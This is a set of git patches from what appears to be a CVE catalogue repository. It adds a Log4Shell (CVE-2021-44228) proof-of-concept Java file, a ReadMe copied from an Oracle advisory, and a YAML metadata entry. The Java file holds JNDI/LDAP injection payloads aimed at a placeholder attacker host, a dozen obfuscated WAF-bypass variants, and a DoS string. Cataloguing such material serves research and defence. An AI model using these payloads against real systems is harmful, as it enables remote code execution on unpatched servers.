From 8c93f1235d2cdc4e378b642dea94792fece8a8c3 Mon Sep 17 00:00:00 2001
From: Hua <jason_hua@buaa.edu.cn>
Date: Tue, 14 Mar 2023 13:00:50 +0000
Subject: [PATCH 1/6] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2021-44228?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/apache/2021/CVE-2021-44228/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/apache/2021/CVE-2021-44228/.keep

diff --git a/cve/apache/2021/CVE-2021-44228/.keep b/cve/apache/2021/CVE-2021-44228/.keep
new file mode 100644
index 00000000..e69de29b
-- 
Gitee


From 53b33ebfe76c481c658ef168e561d59955441fae Mon Sep 17 00:00:00 2001
From: Hua <jason_hua@buaa.edu.cn>
Date: Tue, 14 Mar 2023 13:12:51 +0000
Subject: [PATCH 2/6] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?=
 =?UTF-8?q?apache/2021/CVE-2021-44228/.keep?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/apache/2021/CVE-2021-44228/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 cve/apache/2021/CVE-2021-44228/.keep

diff --git a/cve/apache/2021/CVE-2021-44228/.keep b/cve/apache/2021/CVE-2021-44228/.keep
deleted file mode 100644
index e69de29b..00000000
-- 
Gitee


From 9789352de585c23e5075343ef04c11e625637f32 Mon Sep 17 00:00:00 2001
From: Hua <jason_hua@buaa.edu.cn>
Date: Tue, 14 Mar 2023 13:14:16 +0000
Subject: [PATCH 3/6] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2021-44228?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/apache/2021/CVE-2021-44228/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/apache/2021/CVE-2021-44228/.keep

diff --git a/cve/apache/2021/CVE-2021-44228/.keep b/cve/apache/2021/CVE-2021-44228/.keep
new file mode 100644
index 00000000..e69de29b
-- 
Gitee


From d2a8ced2841ac1d23c118e57be8cbbbf7592fcc5 Mon Sep 17 00:00:00 2001
From: Hua <jason_hua@buaa.edu.cn>
Date: Tue, 14 Mar 2023 13:15:43 +0000
Subject: [PATCH 4/6] rename cve/apache/2021/CVE-2021-44228/.keep to
 cve/apache/2021/CVE-2021-44228/log4j.java LOG4J Java exploit - WAF and
 patches bypass tricks

Signed-off-by: Hua <jason_hua@buaa.edu.cn>
---
 cve/apache/2021/CVE-2021-44228/.keep      |  0
 cve/apache/2021/CVE-2021-44228/log4j.java | 51 +++++++++++++++++++++++
 2 files changed, 51 insertions(+)
 delete mode 100644 cve/apache/2021/CVE-2021-44228/.keep
 create mode 100644 cve/apache/2021/CVE-2021-44228/log4j.java

diff --git a/cve/apache/2021/CVE-2021-44228/.keep b/cve/apache/2021/CVE-2021-44228/.keep
deleted file mode 100644
index e69de29b..00000000
diff --git a/cve/apache/2021/CVE-2021-44228/log4j.java b/cve/apache/2021/CVE-2021-44228/log4j.java
new file mode 100644
index 00000000..92c362c3
--- /dev/null
+++ b/cve/apache/2021/CVE-2021-44228/log4j.java
@@ -0,0 +1,51 @@
+import org.apache.logging.log4j.LogManager;
+import org.apache.logging.log4j.Logger;
+
+public class log4j {
+    private static final Logger logger = LogManager.getLogger(log4j.class);
+
+    public static void main(String[] args) {
+
+        // To test entry you can use website:
+        // http://dnslog.cn/
+        // or
+        // http://canarytokens.org/generate (Choose Log4Shell token)
+
+        // Defaul one
+        logger.error("${jndi:ldap://somesitehackerofhell.com/z}");
+
+        // 1. System environment variables
+        // logger.error("${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//somesitehackerofhell.com/z}");
+
+        // 2. Lower Lookup
+        // logger.error("${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://somesitehackerofhell.com/z}");
+
+        // 2. Upper Lookup
+        // upper doesn't work for me - Tested on Windows 10
+        // logger.error("${${upper:j}ndi:${upper:l}${upper:d}a${upper:p}://somesitehackerofhell.com/z}");
+
+        // 3. "::-" notation
+        // logger.error("${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://somesitehackerofhell.com/z}");
+
+        // 4. Invalid Unicode characters with upper
+        // logger.error("${jnd${upper:ı}:ldap://somesitehackerofhell.com/z}");
+
+        // 5. System properties
+        // logger.error("${jnd${sys:SYS_NAME:-i}:ldap://somesitehackerofhell.com/z}");
+
+        // 6. ":-" notation
+        // logger.error("${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://somesitehackerofhell.com/z}");
+
+        // 7. Date
+        // logger.error("${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://somesitehackerofhell.com/z}");
+
+        // 9. Non-existent lookup
+        // logger.error("${${what:ever:-j}${some:thing:-n}${other:thing:-d}${and:last:-i}:ldap://somesitehackerofhell.com/z}");
+
+        // 12. Trick with # (works on log4j 2.15)
+        // logger.error("${jndi:ldap://127.0.0.1#somesitehackerofhell.com/z}");
+
+        // 13. Dos attack (Works on LOG4j 2.8 - 2.16 )
+        // logger.error("${${::-${::-$${::-j}}}}");
+    }
+}
-- 
Gitee


From 204fda0e0c2668f4ef0943f741d6b88b2aa191cd Mon Sep 17 00:00:00 2001
From: Hua <jason_hua@buaa.edu.cn>
Date: Tue, 14 Mar 2023 13:29:06 +0000
Subject: [PATCH 5/6] add cve/apache/2021/CVE-2021-44228/ReadMe.md.
 CVE-2021-44228 ReadMe

Signed-off-by: Hua <jason_hua@buaa.edu.cn>
---
 cve/apache/2021/CVE-2021-44228/ReadMe.md | 40 ++++++++++++++++++++++++
 1 file changed, 40 insertions(+)
 create mode 100644 cve/apache/2021/CVE-2021-44228/ReadMe.md

diff --git a/cve/apache/2021/CVE-2021-44228/ReadMe.md b/cve/apache/2021/CVE-2021-44228/ReadMe.md
new file mode 100644
index 00000000..58a94cf9
--- /dev/null
+++ b/cve/apache/2021/CVE-2021-44228/ReadMe.md
@@ -0,0 +1,40 @@
+# CVE-2021-44228
+PoC for CVE-2021-44228
+
+
+### Description
+This Security Alert addresses CVE-2021-44228, a remote code execution vulnerability in Apache Log4j. It is remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. It also addresses CVE-2021-45046, which arose as an incomplete fix by Apache to CVE-2021-44228.
+
+Due to the severity of this vulnerability and the publication of exploit code on various sites, Oracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible.
+
+### Security Alert Supported Products and Versions
+
+Patches released through the Security Alert program are provided only for product versions that are covered under the Premier Support or Extended Support phases of the Lifetime Support Policy. Oracle recommends that customers plan product upgrades to ensure that patches released through the Security Alert program are available for the versions they are currently running.
+
+Product releases that are not under Premier Support or Extended Support are not tested for the presence of vulnerabilities addressed by this Security Alert. However, it is likely that earlier versions of affected releases are also affected by these vulnerabilities. As a result, Oracle recommends that customers upgrade to supported versions.
+
+Database, Fusion Middleware, Oracle Enterprise Manager products are patched in accordance with the Software Error Correction Support Policy explained in My Oracle Support Note 209768.1. Please review the Technical Support Policies for further guidelines regarding support policies and phases of support.
+
+### Risk Matrix Content
+
+Risk matrices list only security vulnerabilities that are newly addressed by the patches associated with this advisory. Risk matrices for previous security patches can be found in previous Critical Patch Update advisories and Alerts. An English text version of the risk matrices provided in this document is here.
+
+Security vulnerabilities are scored using CVSS version 3.1 (see Oracle CVSS Scoring for an explanation of how Oracle applies CVSS version 3.1).
+
+Oracle conducts an analysis of each security vulnerability addressed by a Security Alert. Oracle does not disclose detailed information about this security analysis to customers, but the resulting Risk Matrix and associated documentation provide information about the type of vulnerability, the conditions required to exploit it, and the potential impact of a successful exploit. Oracle provides this information, in part, so that customers may conduct their own risk analysis based on the particulars of their product usage. For more information, see Oracle vulnerability disclosure policies.
+
+Oracle lists updates that address vulnerabilities in third-party components that are not exploitable in the context of their inclusion in their respective Oracle product beneath the product's risk matrix.
+
+The protocol in the risk matrix implies that all of its secure variants (if applicable) are affected as well. For example, if HTTP is listed as an affected protocol, it implies that HTTPS (if applicable) is also affected. The secure variant of a protocol is listed in the risk matrix only if it is the only variant affected, e.g. HTTPS will typically be listed for vulnerabilities in SSL and TLS.
+
+### Reference
+
+1. https://www.oracle.com/security-alerts
+2. https://www.oracle.com/security-alerts/cpufaq.html
+3. https://www.oracle.com/security-alerts/advisorymatrixglossary.html
+4. https://www.oracle.com/security-alerts/cvssscoringsystem.html
+5. https://www.oracle.com/security-alerts/cve-2021-44228verbose.html
+6. https://www.oracle.com/docs/tech/security-alerts/cve-2021-44228cvrf.xml
+7. https://www.oracle.com/security-alerts/public-vuln-to-advisory-mapping.html
+8. https://www.oracle.com/support/lifetime-support/resources.html
+9. https://support.oracle.com/rs?type=doc&id=2591118.1
\ No newline at end of file
-- 
Gitee


From 6f43c472c97735a3d374e286be51ff816d6b4015 Mon Sep 17 00:00:00 2001
From: Hua <jason_hua@buaa.edu.cn>
Date: Tue, 14 Mar 2023 14:16:58 +0000
Subject: [PATCH 6/6] add cve/apache/2021/yaml/CVE-2021-44228.yaml update
 CVE-2021-44228

Signed-off-by: Hua <jason_hua@buaa.edu.cn>
---
 cve/apache/2021/yaml/CVE-2021-44228.yaml | 23 +++++++++++++++++++++++
 1 file changed, 23 insertions(+)
 create mode 100644 cve/apache/2021/yaml/CVE-2021-44228.yaml

diff --git a/cve/apache/2021/yaml/CVE-2021-44228.yaml b/cve/apache/2021/yaml/CVE-2021-44228.yaml
new file mode 100644
index 00000000..485fdc52
--- /dev/null
+++ b/cve/apache/2021/yaml/CVE-2021-44228.yaml
@@ -0,0 +1,23 @@
+id: CVE-202144228
+source: https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words
+info:
+  name: Apache Log4j2 
+  severity: critical
+  description:
+   This Security Alert addresses CVE-2021-44228, a remote code execution vulnerability in Apache Log4j. It is remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. It also addresses CVE-2021-45046, which arose as an incomplete fix by Apache to CVE-2021-44228.
+  scope-of-influence:
+    Apache Log4j 2.x >=2.0-beta9 and < 2.15.0 (2.12.2 no effect)
+  reference:
+    - https://logging.apache.org/log4j/2.x/security.html
+    - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
+    - https://avd.aliyun.com/detail?id=AVD-2021-920285
+    - https://avd.aliyun.com/detail?id=AVD-2021-45046
+  classification:
+    cvss-metrics:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cve-id: CVE-2021-44228
+    cwe-id: CWE-94
+    cnvd-id: None
+    kve-id: None
+  tags: 
+    - Remote code execution vulnerabilities
\ No newline at end of file
-- 
Gitee